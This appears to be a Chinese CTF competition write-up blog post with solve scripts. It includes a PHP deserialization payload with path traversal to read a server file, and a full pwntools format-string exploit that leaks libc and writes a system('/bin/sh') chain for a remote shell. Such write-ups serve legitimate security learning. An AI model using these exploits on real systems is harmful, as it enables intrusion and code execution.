V3D4's Blog

安全技术记录/分享/交流


NewsCTFWP

WEB

easy_web

md5解码是123456,用数组绕过md5强比较,用数组溢出绕过c(参考蓝帽杯one_point_php),payload如下

图片

得到压缩包密码,在网页背景图里,分离后解压即可

weblog

反序列化字符逃逸,直接上payload吧,凑了好久

O:1:"A":2:{s:1:"1";s:18:"flagflagflagflag??";s:1:"1";s:101:"1";s:10:"weblogfile";s:35:"flagflagflagflagflagflagflagflag???"/../../../../var/www/html/fflaglag.php";}

源码中第一个is_serialized函数检测的是数字后面指定位置是不是以”结束,所以最后会导致weblogfile中出现”,但是不影响读取,有一点很奇怪的事就是必须得以/../../.这样开头才能读取到flag,直接../../也不行,不知道为啥

RE

re_signin

套神把源码改的我不太看得懂,后来问他才知道统计下冒泡排序次数即可

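import ast

# Challenge data: one Python list literal of 22 integers per line.
s = '''[73, 69, 60, 20, 64, 68, 99, 4, 36, 9, 91, 42, 75, 43, 8, 77, 55, 70, 84, 37, 3, 93]
[85, 46, 47, 99, 58, 35, 83, 3, 57, 18, 52, 17, 97, 16, 6, 51, 84, 62, 1, 41, 88, 87]
[97, 34, 31, 80, 19, 57, 10, 84, 4, 50, 43, 63, 65, 88, 30, 72, 21, 36, 27, 41, 86, 79]
[31, 23, 68, 67, 30, 47, 27, 40, 73, 63, 11, 89, 18, 5, 9, 74, 88, 38, 8, 20, 50, 83]
[88, 5, 85, 82, 36, 74, 6, 15, 40, 55, 95, 8, 84, 47, 96, 33, 25, 29, 77, 67, 26, 39]
[54, 53, 0, 37, 66, 91, 39, 38, 57, 6, 47, 28, 49, 92, 29, 85, 88, 84, 90, 13, 35, 52]
[80, 18, 26, 91, 10, 52, 11, 99, 85, 75, 60, 48, 36, 74, 55, 51, 86, 49, 89, 29, 82, 16]
[35, 70, 42, 44, 18, 65, 84, 71, 26, 14, 38, 28, 21, 86, 20, 54, 30, 11, 66, 10, 69, 77]
[71, 25, 43, 23, 29, 6, 33, 44, 5, 30, 32, 18, 47, 13, 76, 8, 83, 87, 57, 26, 16, 19]
[29, 51, 7, 62, 94, 32, 57, 1, 71, 84, 92, 16, 18, 19, 56, 52, 40, 80, 98, 44, 82, 33]
[67, 14, 93, 91, 78, 80, 7, 37, 10, 82, 38, 83, 23, 27, 17, 76, 74, 18, 66, 24, 99, 43]
[29, 56, 44, 54, 70, 31, 10, 38, 8, 85, 18, 22, 32, 49, 2, 21, 50, 5, 25, 48, 90, 84]
[23, 33, 90, 7, 42, 71, 25, 58, 5, 47, 54, 18, 97, 72, 2, 1, 68, 64, 76, 85, 69, 49]
[77, 67, 52, 31, 35, 6, 56, 94, 81, 23, 78, 50, 15, 10, 28, 69, 43, 91, 82, 72, 99, 38]
[20, 47, 52, 27, 73, 64, 9, 62, 3, 57, 2, 97, 44, 35, 89, 10, 18, 29, 58, 56, 74, 84]
[66, 11, 76, 91, 70, 9, 6, 75, 32, 71, 44, 48, 88, 20, 98, 97, 79, 63, 47, 78, 60, 81]
[43, 13, 70, 23, 31, 69, 52, 30, 2, 78, 0, 37, 73, 93, 18, 1, 51, 62, 25, 68, 65, 87]
[24, 86, 29, 0, 93, 51, 53, 47, 16, 40, 94, 98, 88, 64, 41, 83, 44, 35, 45, 75, 17, 46]
[33, 12, 63, 77, 25, 24, 47, 58, 6, 89, 97, 27, 21, 96, 92, 50, 82, 76, 5, 62, 56, 44]
[12, 36, 16, 44, 19, 62, 43, 80, 58, 98, 69, 97, 1, 7, 49, 26, 70, 34, 53, 13, 65, 48]
[51, 74, 76, 98, 33, 78, 44, 45, 4, 65, 99, 84, 80, 93, 37, 56, 77, 9, 6, 94, 52, 88]
[80, 38, 88, 66, 7, 40, 70, 24, 2, 12, 76, 18, 57, 73, 58, 83, 33, 17, 89, 69, 77, 67]
[18, 53, 14, 24, 94, 42, 61, 75, 62, 60, 73, 2, 65, 48, 80, 23, 44, 91, 7, 0, 31, 71]
[16, 54, 87, 75, 8, 23, 33, 56, 22, 63, 1, 2, 25, 6, 84, 80, 4, 49, 17, 42, 14, 43]'''.split('\n')

# Bubble-sort every row and count the swaps; each row's swap count is printed
# as one character of the output.
for row in s:
    # literal_eval only accepts Python literals. eval() is unnecessary for plain
    # data and would execute any expression that ended up in a row.
    nums = ast.literal_eval(row)
    count = 0
    for i in range(len(nums) - 1):
        for j in range(len(nums) - i - 1):
            if nums[j] > nums[j + 1]:
                nums[j], nums[j + 1] = nums[j + 1], nums[j]
                count += 1
    print(chr(count), end='')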

Crypto

签到

base64->hextostr->base64->base32即可

RSA256

原题,flag都没改

https://blog.csdn.net/weixin_41676901/article/details/84897686

要做也很简单,从公钥里导n,e,n挺小的很好分解,然后常规做法就好了

big exponent

strving师傅大意了,n可以分解,不然不会,n扔到factordb上分解后常规做法即可

导出n,e

from Crypto.PublicKey import RSA
from Crypto.Util.number import bytes_to_long
# Read the PEM-encoded public key and print its two public parameters.
path = 'pubkey3.pem'
with open(path) as pem_file:
    pem_text = pem_file.read()
key = RSA.import_key(pem_text)
# The write-up goes on to factor this modulus, so the weakness lies in how the
# key was generated, not in how it is parsed here.
print('e = %d' % key.e)
print('n = %d' % key.n)
#14922959775784066499316528935316325825140011208871830627653191549546959775167708525042423039865322548420928571524120743831693550123563493981797950912895893476200447083386549353336086899064921878582074346791320104106139965010480614879592357793053342577850761108944086318475849882440272688246818022209356852924215237481460229377544297224983887026669222885987323082324044645883070916243439521809702674295469253723616677245762242494478587807402688474176102093482019417118703747411862420536240611089529331148684440513934609412884941091651594861530606086982174862461739604705354416587503836130151492937714365614194583664241

分解n
图片

求d和flag

from binascii import b2a_hex, a2b_hex
p = 101762447604961968347497011921099322367324119881977823223715806843654916018223203152717441386396615480134613864942068489600487206751473112264495957512819776729786840027245275219664091321087832913341367749452671938119115622233015167030327196487127307195872792552039408988207189866115101567965404039921455793363
q = 146645055489569596158773422326511843870914610026045288623162173369449741025994927278359852181645222010216728295790096211969513458244344811852179454305768973973420398459241985170762812039623053792853389316411927678494740679905048052776274447299638217155556426312374908963757267001415016478005573936685580868907
# Public exponent (the value the export step prints for pubkey3.pem, per the write-up).
e = 65537
# (p-1)*(q-1) is Euler's totient of n = p*q when p and q are distinct primes;
# the private exponent is the inverse of e modulo this value.
n1 = (p-1)*(q-1)
def computeD(fn, e):
    """Return the coefficient of ``e`` from extendedGCD(fn, e), made non-negative.

    extendedGCD yields (x, y, g) with fn*x + e*y == g, so when g is 1 the
    returned value is the inverse of ``e`` modulo ``fn``.
    """
    _, coeff_e, _ = extendedGCD(fn, e)
    # The coefficient can come back negative; add the modulus once in that case.
    return fn + coeff_e if coeff_e < 0 else coeff_e

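def extendedGCD(a, b):
    """Iterative extended Euclidean algorithm.

    Returns a tuple (x, y, g) with a*x + b*y == g, where g is the last
    non-zero remainder of the Euclidean division chain.
    """
    # Degenerate case: a*1 + b*0 = a
    if b == 0:
        return (1, 0, a)
    # (x1, y1) expresses the current a, (x2, y2) the current b, both as
    # combinations of the original arguments.
    x1, y1 = 1, 0
    x2, y2 = 0, 1
    while b != 0:
        # Floor division keeps the quotient an exact integer on Python 3 too.
        # "/" yields a float there, which silently corrupts RSA-sized operands.
        q = a // b
        # r(i) = r(i-2) % r(i-1)
        a, b = b, a % b
        # x(i) = x(i-2) - q*x(i-1), and the same recurrence for y
        x1, x2 = x2, x1 - q * x2
        y1, y2 = y2, y1 - q * y2
    return (x1, y1, a)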
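# Derive the private exponent from (p-1)*(q-1) and show it, so it can be
# compared with the literal d used for the decryption below.
d = computeD(n1, e)
# print() with a single argument behaves the same on Python 2 and Python 3.
print(d)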
n = 14922959775784066499316528935316325825140011208871830627653191549546959775167708525042423039865322548420928571524120743831693550123563493981797950912895893476200447083386549353336086899064921878582074346791320104106139965010480614879592357793053342577850761108944086318475849882440272688246818022209356852924215237481460229377544297224983887026669222885987323082324044645883070916243439521809702674295469253723616677245762242494478587807402688474176102093482019417118703747411862420536240611089529331148684440513934609412884941091651594861530606086982174862461739604705354416587503836130151492937714365614194583664241
e = 65537
d = 1939800331566969231238499015822509112476429429000093460441850234380434721220893677233263681227591784640705105525336597901982046073250795813524219049192976738693434376052764300182646814671621671477801720559611455618661311349684672141832053588644909370595398536507540341289588555297140287641708389630308238553172611266699686889379601602610469415063423013345736857782550053021078819020067550134344105137814580449077427858909794966473721010515649636326903213468586689155646653944112043414898255582980672417192877508798211902504438276421956697069545353793760656596452907166622956502069975310714123208306176957819373985837
c = 13588308754487501762272172208712318470964859176652577458638024519480735855818472303106858749915814550461910418646406700170082046186554145725557043936145140194933021730755513423578786764011056162938992387100796757014593094008991782255713805995176848852766732112164930205392912473230406409264100813330524943900982304318443191423451054839557467742745949438737542068086381654151110306175775812710381629573025118044260105783919637399158227269427335571564198203340527807724651819028353642948898069219998495619755188155171878748423838578394494069031250303548302394317271641687619649147938309858970251498601554761618266353917
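# Raw RSA decryption: m = c^d mod n.
# NOTE(review): the result decodes straight to text, so presumably no padding
# scheme (e.g. OAEP) was applied. Together with the factorable modulus, that
# is what makes recovery this direct.
m = pow(c, d, n)
print(m)
# Convert the integer plaintext to a string: hex digits first, then one
# character per byte.
m = str(hex(m))
# Python 2 appends 'L' to the hex form of a long; strip it along with '0x'.
m = m.replace('0x', '').replace('L', '')
print(m)
res = ''
print(len(m))
# hex() drops a leading zero nibble; pad to an even length so the digits pair
# up into whole bytes instead of shifting every byte boundary by one digit.
if len(m) % 2:
    m = '0' + m
# "//" keeps the loop bound an integer on Python 3 as well.
for i in range(len(m) // 2):
    tmp = int(m[i*2:i*2+2], 16)
    res = res + chr(tmp)
print(res)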

字符串与字节

脑洞题,上面取一位下面取一位合起来再八位一转字符即可

from Crypto.Util.number import long_to_bytes
s1 = '010101100100010101110101010001010100010001000101010101100100011001010110011001000100010001000110011001100110010001100100010101100100010001010101010101010101010101000110'
s2 = ' 101010101001101111011001101101011011011101000100100100110110010010010101001101101010011101000011010101010101010000110111100001000101101010000110101010011000101001001111'
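# Interleave the two streams bit by bit: s1 supplies the even positions and
# s2 the odd ones (index i + 1 skips the leading space in s2).
bits = ''.join(s1[i] + s2[i + 1] for i in range(len(s1)))
print(bits)
# Decode the computed bit string directly instead of a hand-pasted copy of the
# printed output, so the decoded value cannot drift from s1 and s2.
print(long_to_bytes(int(bits, 2)))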

Pwn

61happy

from pwn import *
# p = remote('81.68.86.115',10001)
# Solve script for the "61happy" challenge service (Python 2 / pwntools).
# Local copies of the challenge binary and its libc are loaded for symbol offsets.
elf = ELF('./qiandao')
libc = ELF('./libc-2.31.so')
context.log_level = 'debug'
#p = process('./qiandao')
p = remote('81.68.86.115', 10001)
# Stage 1: information leak. Positional %p conversions are sent as ordinary
# input and the replies are parsed as addresses below, so the service
# presumably passes client bytes to a printf-family call as the format string.
# That is the root defect; the fix is a constant format, e.g. printf("%s", buf).
payload = '%7$p-%9$p'
p.send(payload)
# The first leaked value is treated as __libc_start_main+243, which discloses
# the libc load address and so removes the protection ASLR would give.
libc_base = int(p.recv(14), 16) - libc.symbols['__libc_start_main'] - 243
p.recvuntil('-')
# The second leaked value is treated as a stack address; the fixed offsets are
# specific to this binary's frame layout. TODO confirm against the binary.
stack_addr = int(p.recv(14), 16)
stack_addr = stack_addr - 176 - 0x40
# Addresses inside libc, all derived from the leaked base.
shell = libc_base + 0xe6af1
pop_rdi = libc_base + 0x00276e9
binsh = libc_base + libc.search('/bin/sh').next()
system = libc_base + libc.symbols['system']
# Stage 2: memory writes. From here on every step is a pair of sends built on
# the %n family (%hn / %hhn), which stores the count of characters printed so
# far. Each pair places part of pop_rdi, binsh or system on the stack.
# Defender's view: %n in a format string held in writable memory is what
# glibc's _FORTIFY_SOURCE=2 aborts on at run time, and -Wformat-security flags
# the non-constant format call at build time.
payload = '%' + str(stack_addr & 0xffff) + 'c%9$hnaa\x00'
p.send(payload)
# The literal "aa" marks the end of each reply, so the script stays in step
# with the service.
p.recvuntil('aa')
payload = '%' + str(pop_rdi & 0xffff) + 'c%37$hnaa\x00'
p.send(payload)
p.recvuntil('aa')
# The same two-send pattern repeats below with increasing byte offsets added
# to the low byte of stack_addr.
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str(binsh & 0xffff) + 'c%37$hnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 2
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str((binsh >> 16) & 0xff) + 'c%37$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 8 + 8
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str(system & 0xffff) + 'c%37$hnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 8 + 8 + 2
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str((system >> 16) & 0xffff) + 'c%37$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 8 + 8 + 2 + 1
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str((system >> 24) & 0xff) + 'c%37$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 8 + 8 + 2 + 1 + 1
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str((system >> 32) & 0xff) + 'c%37$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
data = (hex(stack_addr))[-2:]
data = int(data, 16) + 8 + 8 + 8 + 2 + 1 + 1 + 1
payload = '%' + str(data) + 'c%9$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
payload = '%' + str((system >> 40) & 0xff) + 'c%37$hhnaa\x00'
p.send(payload)
p.recvuntil('aa')
# Final input contains no format directives. Presumably it is the string that
# makes the service leave its input loop. TODO confirm against the binary.
payload = '61happy\x00'
p.send(payload)
p.interactive()

MISC

very-ez-dump

搜索文件发现有flag.zip和hint.txt,hint里的内容说压缩包密码是用户密码,最后在cmdline里找到密码,过程不想重复了这里就不截图了,具体vol的命令自己网上搜

图片

图片

sign in

有密码的pdf,用apdfpr爆破下密码就好了,纯数字

图片

图片

Peltate

八神的题,被非预期了,放tweakpng里调成灰度图直接出了flag

图片

图片

每天一隐写,套神远离我,八神对套神的爱无处不在

base64 … or base56?

又是八神对套神的一次致敬,base64解码后补全八位再七位一组转字符即可

import base64
s = 'm4enLzv56NeFBk37NnNAow7Oe9Br3b++5Bh5oMWHF156NeFBk37NnNYg59MOPXp3Z0GTfs2c1iDdl59NO7Ogyb9mzmsQUuvPnpw7kHTLhQZN+zZzWIN/JBS68+enDuQZN+zZzUoMPLKgwoOeXog35kHffvyZdyDJv2bOaDfmQZMuPllw89O7Og56fWVBw2YceXIg37sqDTu56cmVBh3b+mjLyXIKmjKg3YduVBtw9OXnfz0a8KxBs09MvLDs2eUCLZp6dNmVBtw9OW/ciWINPNBhQZNO3Tu69NPbKgzb+W1BvzIOmjKgpdefPTh3IM2Xbh2ZUGbTy59EG7DtyoEU3D05ed+7CiQb+SBFNw9OXnfz0YUS5BBQc8vRBvzINuHpy87+ejXh5oMe/dz08+nNBvzIMKDvv35Mu5Bm05+vLKsQd9GnHoQc8vDDyw9MvNBh6IOmjKg26cmTZlWIOm/ggzct+1Bi39Om/asQdN6Dll7ZcOxBhQc9uHZsy8kGbTn68sqDfmQdNGVBzw7cqDnv5dEGndz05MqxB30acehBow81iDTuQdOvLcsQYd2/poy8kGbTn68sqDTu56cmVBvzINPRYgw7siDnvQb9y5BU0ZUGbTy59EFLrz56cO5Buy8+mXIgyb9mxBzy9EHfDzQbcOTKg07kDFw5YIMXlB3378iDp15btO7Ogx8sObpz24dyDDuyIO+/fkQY8PLtl5IK2Hnp2eUFrt53+sm/Ho16dyDNy37UGFBky89OfcgxeUFPLyz5fKCbh2eevTTuWIO+jeg74eaDCgzb9mtBj5Yc3Tmg4YdO7pl5IMPRBBxcsO3pzy9t65BU5Ycmnpp37sOzZ5QdNGVBv69MvJBsw+cvJBp5oMKDvv24dyxBk5ZefPLkQadyDCg54eWHNh3LEGFBs37s6DDuyIOejDwy7MvPmg6csOTT00792HYgpdefPTh3IOGXDzw7uiDV128MvJBk5ZefNcgqaMqDNpz9eWXmg07uenJlQbcPlBiyoN+ZBh3eUGfLuyZeTtB00ZUHPbh2bMvPosQad27Ly27+fRBk37NiDTzQdPPDTjw7NnlBhQYsOLyg6deW7LkQZuW/agwoOendn2ZUHDTlx5UG/Mg779+Rcgm9cehBvzIOmjKgw8umnn05eUGnmg07kHTRlQcMOnd007s6DfmQZcOPQgyb9mxYg76NOPQgx4dyDFlQdsvLygy7MOLfyw9Mq5BU0ZUGTfs2c0G/N0y7kGbfs2b+6DCg6aMu3K7QdNGVB00ZduXmg24fKDth5eViDNy37UGbDp5eUHTDsyoMejDyw4+mXlzQdN6Cnv7acvRBsy4cmXlzXIJO5B00ZUHfLz6LEG3D05ed/PRrwoMm/Zs5oMPLKg35umXcg5Zc2Xlyy5EHTegw80GLDi689GvCgyb9mzmsQYsOLrz0a8KDblw7tO7OgRZ+WHdk27+mjLyRIN/JAi37MiDvv24dyJcgnRa9OHUje6e+/30ML7Hnf6aGd+PvyX9+a/Nw9OXnfz0a8P0='
# Decode the base64 text, then expand every byte into its 8-bit binary form.
s = base64.b64decode(s)
res = ''.join(format(byte, '08b') for byte in s)
print(res)
print(len(res))
# Re-read the same bit stream in 7-bit groups, one character per group;
# bits left over after the last full group are not printed.
for start in range(0, len(res) - 6, 7):
    print(chr(int(res[start:start + 7], 2)), end='')

happy六一

挺套的一个题还要用到pycc上的一个很少见的工具

先拿到一个happy和hint.txt,happy明显是倒过来的zip,写个脚本倒一下

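# 'happy' is a ZIP archive stored back to front; reverse it byte by byte.
with open('happy', 'rb') as f:
    c = f.read()
# Context managers close both handles even when the read or write fails;
# the input file was previously never closed.
with open('hp.zip', 'wb') as f1:
    f1.write(c[::-1])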

解压hp.zip得到以下文件
图片

打开md发现只有六一两个字,结合文件名肯定是画图,先画出来

# from PIL import Image
# import matplotlib.pyplot as plt
# f = open('./hp/draw起来.md',encoding='utf-8')
# c = f.read().strip()
# img = Image.new('RGB',(383,311),(255,255,255))
# print(c[:383])
# for j in range(311):
#     for i in range(383):
#         # print(c[i+311*j])
#         if c[i+383*j]=='一':
#             img.putpixel((i,j),(0,0,0))
# img.save('draw.png')

图片

画出来发现没有任何卵用,不知道意义何在。。

再看到_key.png,文件名前面加了下划线,加上stegsolve里看到01通道有lsb,明显的stegpy特征,现在就是找密钥

在文件末尾发现一串01,八位一组转字符

# s = '01110000011101110110010000100000011010010111001100100000001100010011001000110011001101000011010100110110'
# tmp = ''
# for i in s:
#     tmp+=i
#     if len(tmp)==8:
#         # print(tmp)
#         print(chr(int(tmp,2)),end='')
#         tmp= ''

图片

得到stegpy密码123456

stegpy后得到一串base64,解密过程如下

stegpy
fERASmxgfD82SQ== base64
|D@Jl`|?6I base91
happy6.1

最后用Encrypto这个软件解密flag.crypto,得到一个flag.txt
图片

全选一下,明显是snow隐写特征

图片
图片

!了反都,了反

套神的题,在流量包里发现的倒过来的rar,导出那个rar包,写个脚本反过来

图片

图片

# f = open('123.rar','rb').read()
# f1 = open('flag.rar','wb')
# f1.write(f[::-1])
# f1.close()

打开rar发现密码是当前这个tcp流上面的密码,即passwd123
图片

图片

解压后得到前后颠倒的很多串base64,明显的base64隐写,把每一行倒过来后再找个base64隐写脚本解码即可

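# Every line of flag.txt is a base64 string stored back to front; write the
# re-reversed lines to tf.txt for the extraction step.
with open('flag/flag.txt') as src:
    f = src.readlines()
# "with" closes both files even if a write fails; the input handle was
# previously never closed.
with open('flag/tf.txt', 'w') as f1:
    for i in f:
        f1.write(i.strip()[::-1] + '\n')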
import re
import base64
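# Standard base64 alphabet; a character's index is its 6-bit value.
b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
# pattern2 captures the character before a "==" padding,
# pattern1 the character before a single "=" padding.
pattern2 = r'(\S)==$'
pattern1 = r'(\S)=$'
# Compile once instead of on every line. "==" must be tried first because
# pattern1 also matches a line that ends in "==".
two_pad = re.compile(pattern2)
one_pad = re.compile(pattern1)
# Hidden bits collected from all lines, in file order.
binstring = ''
# tf.txt holds the base64 lines to inspect, one per line.
with open('flag/tf.txt', 'r') as f:
    for base64str in f:
        # With "==" the last character has 4 unused low bits, with "=" it has 2.
        # Lines without padding hide nothing and are skipped.
        hit = two_pad.findall(base64str)
        nbits = 4
        if not hit:
            hit = one_pad.findall(base64str)
            nbits = 2
        if not hit:
            continue
        # mstr is the character that carries the hidden bits.
        mstr = hit[0]
        value = b64chars.find(mstr)
        if value < 0:
            # Previously a -1 index produced a malformed bit string that only
            # failed later, inside int(); report the offending character here.
            raise ValueError('not a standard base64 character before padding: %r' % mstr)
        # Zero-pad the value to 6 bits and keep only the unused low bits.
        binstring += format(value, '06b')[-nbits:]
# Regroup the collected bits 8 at a time and print each group as a character.
for i in range(0, len(binstring), 8):
    print(chr(int(binstring[i:i+8], 2)), end='')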

🍞🧀🍞

套神的题,也是最套的一个题了应该

前面两步都可以用厨子一把梭(cyberchef)

图片

解压密码为祝好运

解压得到一个视频,视频后面分离下得到一个压缩包

图片
图片

视频打不开,盲猜异或,继续用厨子,视频比较大,需要跑一会

图片

异或0x63的时候出了,导出发现还是播放不了,拖到010里随便找个mp4对比下,发现套神是把第四位0x20改成了0x18,改回来就好了

图片

图片

打开视频发现是玩梗,最近很火的两面包夹芝士,而压缩包的密码就是up的名字

图片

图片

打开发现是一张宽度被改的png,crc32没问题,爆破下宽度即可,得到宽度为0x02bc,宽度正常后再拉高高度,得到一个蓝奏云地址

图片

图片

下载下来得到一个加密的压缩包,注释里发现malbolge语言

图片

https://zb3.me/malbolge-tools/网站解码得到解压密码

图片

下载下来得到一张我们联合.png

图片

观察文件末尾,发现明显的oursecret加密痕迹以及一句:明日方舟里为谁献出心脏?(5字符)

想起来b站两面包夹芝士视频p2里up主大喊过一句:为斯卡蒂献出心脏!https://www.bilibili.com/video/BV1bq4y177EK?p=2

所以oursecret密码为Skadi

记得拖到oursecret解密的时候把后面那句话删掉,不然识别不到

图片

要这样子oursecret才能识别

图片

最后oursecret解码出一张一样的图片

图片

图片

本来以为不是盲水印就是xor,后来发现两张图都有lsb,经过套神提醒后才知道是两张图ADD后再lsb

图片

八神再次致敬套神,套了好多层

首先是一张二进制二维码,去https://online-barcode-reader.inliteresearch.com/解码后复制进winhex即可

图片

得到一个bz的压缩包,解压得到16张DataMatrix码

图片

一开始还没意识到,八神提醒后才知道,上面那个解码网站就有,麻了

图片

再将16张DataMatrix码按顺序拼成4*4的大码,去https://demo.dynamsoft.com/barcode-reader/解码,得到一大串base64

图片

解码发现是zip

图片

拿到zip后再解压发现是八神自己改编的brainfuck

图片

8+8-这种就代表有几个加号几个减号,写脚本一步步还原,或者拿notepad++手撸,我脚本写太拉了,一步步来的,先还原两位数+-,再还原一位数+-,最后还原一位数.

import re
# bf = '8+[->8+<]>16+.5-.<8+[->8-<]>8-.+.<4+[->4+<]>.<4+[->4-<]>4-3.8+.8-.<9+[->9+<]>3+.6-.<10+[->10+<]>7+.<10+[->10-<]>3-.<12+[->12+<]>20+.<9+[->9-<]>2-.<7+[->7+<]>8+.5+.<11+[->11-<]>16-.<9+[->9-<]>7-3.<7+[->7+<]>9+.<7+[->7-<]>5-.4-2.<3+[->3+<]>+.<3+[->3-<]>-3.<10+[->10+<]>.2+.7-.<4+[->4+<]>.6+.-.<8+[->8-<]>6-.<8+[->8+<]>6+.4+.4-.<10+[->10+<]>5+.<11+[->11-<]>17-.<5+[->5-<]>9-.<5+[->5-<]>10-.<3+[->3-<]>5-.<5+[->5+<]>8+.<5+[->5-<]>.<15+[->15+<]>18+.<7+[->7-<]>.<11+[->11-<]>20-.<12+[->12+<]>19+.<8+[->8-<]>2-.<8+[->8+<]>7+.<5+[->5-<]>10-.<6+[->6+<]>6+.<4+[->4+<]>3+.<15+[->15-<]>11-.8+.<10+[->10+<]>12+.<11+[->11-<]>2-.3+.<8+[->8+<]>10+.<10+[->10+<]>19+.<13+[->13-<]>19-.<12+[->12+<]>13+.<11+[->11-<]>10-.<3+[->3+<]>5+.<10+[->10+<]>17+.<10+[->10-<]>-.<8+[->8-<]>10-.<7+[->7+<]>14+.<5+[->5-<]>8-.<13+[->13+<]>21+.<14+[->14-<]>6-.<15+[->15+<]>5+.<10+[->10-<]>11-.3-.<10+[->10-<]>2-.<9+[->9+<]>17+.<10+[->10-<]>20-.<6+[->6+<]>8+.<12+[->12+<]>+.<12+[->12-<]>21-.<6+[->6+<]>3+.<8+[->8+<]>13+.<4+[->4+<]>3+.<8+[->8-<]>7-.<11+[->11+<]>10+.<12+[->12-<]>10-.<11+[->11+<]>8+.<8+[->8-<]>10-.<3+[->3-<]>4-.<10+[->10-<]>19-.<12+[->12+<]>13+.<12+[->12-<]>13-.<4+[->4+<]>5+.<4+[->4+<]>6+.<8+[->8+<]>5+.<7+[->7-<]>9-.<7+[->7-<]>.<11+[->11+<]>18+.<4+[->4-<]>7-.<8+[->8+<]>15+.<10+[->10-<]>.<8+[->8-<]>10-.<9+[->9+<]>6+.<10+[->10-<]>16-.<12+[->12+<]>4+.<3+[->3+<]>3+.<11+[->11-<]>14-.<9+[->9+<]>7+.<3+[->3-<]>5-.<10+[->10+<]>19+.<5+[->5+<]>+.6+.<15+[->15-<]>11-.<9+[->9+<]>9+.<10+[->10+<]>13+.<13+[->13-<]>3-.<8+[->8+<]>.<4+[->4-<]>3-.<5+[->5+<]>9+.<8+[->8+<]>2+.<10+[->10-<]>10-.<6+[->6+<]>9+.<4+[->4-<]>2-.<8+[->8-<]>12-.<5+[->5-<]>6-.<8+[->8+<]>15+.5-.<8+[->8-<]>10-.+.<7+[->7+<]>12+.<7+[->7-<]>14-.<4+[->4+<]>4+.<4+[->4-<]>4-3.8+.8-.<9+[->9+<]>3+.6-.<10+[->10+<]>7+.<10+[->10-<]>3-.<12+[->12+<]>20+.<9+[->9-<]>2-.<7+[->7+<]>8+.5+.<11+[->11-<]>16-.<9+[->9-<]>7-3.<7+[->7+<]>9+.<7+[->7-<]>5-.4-2.<3+[->3+<]>+.<3+[->3-<]>-.<6+[->6+<]>.<6+[->6-<]>7.<5+[->5+<]>7+.<5+[->5-<]>7-7.<10+[->10+<]>.2+.7-.<4+[->4+<]>.6+.-.
<8+[->8-<]>6-.<8+[->8+<]>6+.4+.4-.<10+[->10-<]>6-.<3+[->3-<]>-.<5+[->5+<]>7+.<5+[->5-<]>7-5.+.-.<4+[->4+<]>8+.<4+[->4-<]>8-.<11+[->11+<]>15+.<7+[->7+<]>7+.<4+[->4+<]>8+.<11+[->11-<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<11+[->11+<]>13+.<14+[->14-<]>18-.<14+[->14+<]>27+.<11+[->11-<]>9-.<11+[->11+<]>+.<11+[->11-<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<11+[->11+<]>13+.<14+[->14-<]>18-.<14+[->14+<]>27+.<11+[->11-<]>9-.<11+[->11+<]>+.<11+[->11-<]>3-.<9+[->9-<]>3-.<8+[->8+<]>9+.<11+[->11+<]>13+.<14+[->14-<]>18-.<8+[->8+<]>15+.5-.<8+[->8-<]>6-.+.6-4.+.-.+.-.<9+[->9+<]>11+.<9+[->9-<]>11-3.<11+[->11+<]>7+.<11+[->11-<]>7-5.<'
# reg = re.compile(r'\d{2}[+-]')
# res = re.findall(reg,bf)
# rr = re.sub(reg,' ',bf).split(' ')
# print(len(res))
# print(len(rr))
# for i in range(len(res)):
#     print(rr[i],end='')
#     print(int(res[i][:2])*res[i][2],end='')
# print(rr[-1])
# bf = '8+[->8+<]>++++++++++++++++.5-.<8+[->8-<]>8-.+.<4+[->4+<]>.<4+[->4-<]>4-3.8+.8-.<9+[->9+<]>3+.6-.<++++++++++[->++++++++++<]>7+.<++++++++++[->----------<]>3-.<++++++++++++[->++++++++++++<]>++++++++++++++++++++.<9+[->9-<]>2-.<7+[->7+<]>8+.5+.<+++++++++++[->-----------<]>----------------.<9+[->9-<]>7-3.<7+[->7+<]>9+.<7+[->7-<]>5-.4-2.<3+[->3+<]>+.<3+[->3-<]>-3.<++++++++++[->++++++++++<]>.2+.7-.<4+[->4+<]>.6+.-.<8+[->8-<]>6-.<8+[->8+<]>6+.4+.4-.<++++++++++[->++++++++++<]>5+.<+++++++++++[->-----------<]>-----------------.<5+[->5-<]>9-.<5+[->5-<]>----------.<3+[->3-<]>5-.<5+[->5+<]>8+.<5+[->5-<]>.<+++++++++++++++[->+++++++++++++++<]>++++++++++++++++++.<7+[->7-<]>.<+++++++++++[->-----------<]>--------------------.<++++++++++++[->++++++++++++<]>+++++++++++++++++++.<8+[->8-<]>2-.<8+[->8+<]>7+.<5+[->5-<]>----------.<6+[->6+<]>6+.<4+[->4+<]>3+.<+++++++++++++++[->---------------<]>-----------.8+.<++++++++++[->++++++++++<]>++++++++++++.<+++++++++++[->-----------<]>2-.3+.<8+[->8+<]>++++++++++.<++++++++++[->++++++++++<]>+++++++++++++++++++.<+++++++++++++[->-------------<]>-------------------.<++++++++++++[->++++++++++++<]>+++++++++++++.<+++++++++++[->-----------<]>----------.<3+[->3+<]>5+.<++++++++++[->++++++